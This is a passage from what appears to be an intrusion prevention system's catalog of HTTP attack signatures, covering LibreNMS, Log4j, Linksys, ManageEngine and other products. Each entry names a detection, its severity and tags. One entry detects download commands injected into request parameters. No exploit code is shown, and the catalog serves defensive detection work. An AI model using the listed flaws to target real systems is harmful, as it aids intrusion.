Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: LibreNMS-Authenticated-Command-Injection-CVE-2024-51092
Description:
Back to top

HTTP_CRL-LibreNMS-Bills-Information-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1589-5242
Last changed: sgpkg-ips-1589-5242
Vulnerability: LibreNMS-Bills-Information-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: LibreNMS-Device-Display-Name-Stored-Cross-Site-Scripting-CVE-2024-53457
Description:
Back to top

HTTP_CRL-LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-Cross-Site-Scripting-CVE-2025-23200

About this situation: An attempt to exploit a vulnerability in LibreNMS
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1854-5242
Last changed: sgpkg-ips-1854-5242
Vulnerability: LibreNMS-Device-Misc-Dynamic_Override_Config-Stored-XSS-CVE-2025-23200
Description:
Back to top

HTTP_CRL-LibreNMS-Device-Overview-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1818-5242
Vulnerability: LibreNMS-Device-Overview-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: LibreNMS-Device-Port-Settings-Description-Stored-XSS-CVE-2025-23199
Description:
Back to top

HTTP_CRL-LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Vulnerability: LibreNMS-Devicegroupcontroller-Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-Health-View-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Vulnerability: LibreNMS-Health-View-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: LibreNMS-Notifications-Title-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1630-5242
Last changed: sgpkg-ips-1630-5242
Vulnerability: LibreNMS-Outages-Outages.inc.php-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-Packages.inc.php-Package-Name-SQL-Injection

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: LibreNMS-Packages.inc.php-Package-Name-SQL-Injection
Description:
Back to top

HTTP_CRL-LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LibreNMS, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1628-5242
Last changed: sgpkg-ips-1628-5242
Vulnerability: LibreNMS-Ports-List.inc.php-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-LibreNMS-ServiceTemplateController.php-Name-Stored-CSS

About this situation: An attempt to exploit a vulnerability in LibreNMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, LibreNMS, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Vulnerability: LibreNMS-ServiceTemplateController.php-Name-Stored-CSS
Description:
Back to top

HTTP_CRL-Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961

About this situation: An attempt to exploit a vulnerability in Liferay Portal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Liferay Portal, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Liferay-Portal-JSON-Deserialization-RCE-CVE-2020-7961
Description:
Back to top

HTTP_CRL-Liferay-Portal-User-Account-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Liferay Portal detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Liferay Portal, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Liferay-Portal-User-Account-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Lifesize-Room-Command-Execution

About this situation: An attempt to exploit a Lifesize Room Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, LifeSize Room, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1503-5242
Vulnerability: Lifesize-Room-Command-Execution
Description:
Back to top

HTTP_CRL-Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441

About this situation: An attempt to exploit a vulnerability in Linear eMerge detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Linear eMerge, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Vulnerability: Linear-eMerge-E3-Series-OS-Command-Injection-CVE-2024-9441
Description:
Back to top

HTTP_CRL-Linksys-Routers-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Linksys Router detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Linksys Router, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1323-5242
Vulnerability: Linksys-Routers-Remode-Code-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-Linksys-WRT110-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Linksys WRT110 router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Linksys WRT110 Router, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1060-5242
Vulnerability: Linksys-WRT110-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Linksys-WRT54-Buffer-Overflow

About this situation: An attempt to exploit a Linksys WRT54 Buffer Overflow vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Linksys WRT54, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: Linksys-WRT54-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Linux-Download-Commands-In-Parameter-Values

About this situation: An attempt to exploit a remote code execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Linux-Download-Commands-In-Parameter-Values
Description:
Back to top

HTTP_CRL-Loadmoney-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-693-5211
Last changed: sgpkg-ips-693-5211
Vulnerability: Win32.Downloader.Loadmoney-Botnet
Description:
Back to top

HTTP_CRL-Log4j-Denial-of-Service-CVE-2021-45105

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1565-5242
Vulnerability: Log4j-Denial-of-Service-CVE-2021-45105
Description:
Back to top

HTTP_CRL-Log4j-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Log4j detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1416-5242
Last changed: sgpkg-ips-1614-5242
Vulnerability: Log4j-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Logsign-Remote-Command-Injection

About this situation: A Logsign Remote Command Injectio vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Logsign, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Vulnerability: Logsign-Remote-Command-Injection
Description:
Back to top

HTTP_CRL-LordEK-Traffic

About this situation: LordEK traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1180-5242
Vulnerability: LordEK-Traffic
Description:
Back to top

HTTP_CRL-Lotus-Notes-iNotes-BOF

About this situation: Possible buffer overflow exploit detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2003, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-339-4219
Last changed: sgpkg-ips-339-4219
Vulnerability: IBM-Lotus-iNotes-Buffer-Overflow-Vulnerability
Description:
Back to top

HTTP_CRL-Lucee-Authenticated-Scheduled-Job-Code-Execution

About this situation: An attempt to exploit a vulnerability in Lucee.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Unix, Any Hardware, Lucee, Windows not specific, Unix not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1564-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: Lucee-Authenticated-Scheduled-Job-Code-Execution
Description:
Back to top

HTTP_CRL-Lumbko.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.Trojan.Lumbko.A-Botnet
Description:
Back to top

HTTP_CRL-Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Magento Magento detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Magento, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-893-5242
Last changed: sgpkg-ips-893-5242
Vulnerability: Magento-Vimeo-Invalid-Image-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CRL-Mail-Manage-EX-Php-Include-Exploit

About this situation: An attempt to exploit a vulnerability in Mail Manage EX was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Mail Manage EX, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Mail-Manage-EX-Php-Include-Exploit
Description:
Back to top

HTTP_CRL-Mailman-Mmstdod-Cgi-System-Compromise

About this situation: Vulnerable mmstdod.cgi accessed
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Endymion MailMan Webmail, CVE2001, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Mailman-Mmstdod-Cgi-System-Compromise
Description:
Back to top

HTTP_CRL-Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in MailStore Software MailStore Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MailStore Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-853-5242
Last changed: sgpkg-ips-853-5242
Vulnerability: Mailstore-Server-Search-Result-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Mako-Server-Remote-Command-Injection

About this situation: A Mako Server Remote Command Injection vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Mako Server, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Mako-Server-Remote-Command-Injection
Description:
Back to top

HTTP_CRL-Malicious-Request

About this situation: A malicious HTTP request detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1863-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CRL-Maltrail-Unauthenticated-Command-Injection

About this situation: An attempt to exploit a vulnerability in Maltrail detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Maltrail, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Vulnerability: Maltrail-Unauthenticated-Command-Injection
Description:
Back to top

HTTP_CRL-Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE

About this situation: An attempt to exploit a vulnerability in Manage Engine Exchange Reporter Plus detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Exchange Reporter Plus, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1117-5242
Last changed: sgpkg-ips-1117-5242
Vulnerability: Manage-Engine-Exchange-Reporter-Plus-Unauthenticated-RCE
Description:
Back to top

HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Manageengine-Applications-Manager-Commonapiutil-Getmglist-Groupid-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Applications-Manager-Commonapiutil-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Manageengine-Applications-Manager-Commonapiutil-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine Applications Manager, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Manageengine-Applications-Manager-Menuhandlerservlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in ManageEngine DesktopCentral detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Vulnerability: Manageengine-Desktop-Central-Dcpluginservelet-Policy-Bypass
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-Java-Deserialization

About this situation: An attempt to exploit a vulnerability in ManageEngine Desktop Central detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Zoho Corporation ManageEngine Desktop Central, CVE2020, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Manageengine-Desktop-Central-Java-Deserialization
Zoho-Manageengine-Filestorage-Getchartimage-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine Desctop Central detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-669-5211
Last changed: sgpkg-ips-669-5211
Vulnerability: Manageengine-Desktop-Central-mdmLogUploader-Directory-Traversal
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in ManageEngine DesktopCentral detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Manageengine-Desktop-Central-Msp-Fileuploadservlet-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-Msp-Statusupdateservlet-Filename-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine DesktopCentral detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: Manageengine-Desktop-Central-Statusupdateservlet-Filename-Directory-Traversal
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in ManageEngine DesktopCentral detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Manageengine-Desktop-Central-Statusupdate-Arbitrary-File-Upload
Description:
Back to top

HTTP_CRL-Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset

About this situation: An attempt to exploit a vulnerability in ManageEngine Desktop Central detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine DesktopCentral, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: Manageengine-Desktop-Central-Unauthorized-Administrative-Password-Reset
Description:
Back to top

HTTP_CRL-Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in ManageEngine EventLog Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine EventLog Analyzer, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Manageengine-EventLog-Analyzer-Agenthandler-Information-Disclosure
Description:
Back to top

HTTP_CRL-Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine EventLog Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, ManageEngine EventLog Analyzer, CVE2015, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Manageengine-EventLog-Analyzer-runQuery-Guest-User-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection

About this situation: An attempt to exploit a vulnerability in ManageEngine Firewall Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine Firewall Analyzer, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-748-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Manageengine-Firewall-Analyzer-runQuery-Guest-User-SQL-Injection
Description:
Back to top

HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Copyfile-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, ManageEngine Applications Manager, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1865-5242
Vulnerability: Manageengine-Multiple-Products-Failoverhelperservlet-Information-Disclosure
Description:
Back to top

HTTP_CRL-Manageengine-Multiple-Products-Failoverhelperservlet-Listdirectory-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in ManageEngine Applications Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine OpManager, ManageEngine Applications Manager, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Manageengine-Multiple-Products-Failoverhelperservlet-Information-Disclosure
Description:
Back to top

HTTP_CRL-Manageengine-Multiple-Products-File-Attachment-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine AssetExplorer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine SupportCenter, ManageEngine AssetExplorer, ManageEngine ServiceDesk Plus, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1378-5242
Vulnerability: Manageengine-Multiple-Products-File-Attachment-Directory-Traversal
Description:
Back to top

HTTP_CRL-Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in ManageEngine AssetExplorer detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine AssetExplorer, ManageEngine ServiceDesk Plus, CVE2014, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Manageengine-Multiple-Products-Wsdiscoveryservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Arbitrary-File-Download

About this situation: An attempt to exploit a vulnerability in ManageEngine NetFlow or ManageEngine IT360 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine IT360, ManageEngine NetFlow, CVE2014, Any Operating System not specific, Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Manageengine-NetFlow-Analyzer-And-IT360-Creportpdfservlet-Vulnerability
Description:
Back to top

HTTP_CRL-Manageengine-NetFlow-Analyzer-And-IT360-CSVServlet-Arbitrary-File-Download

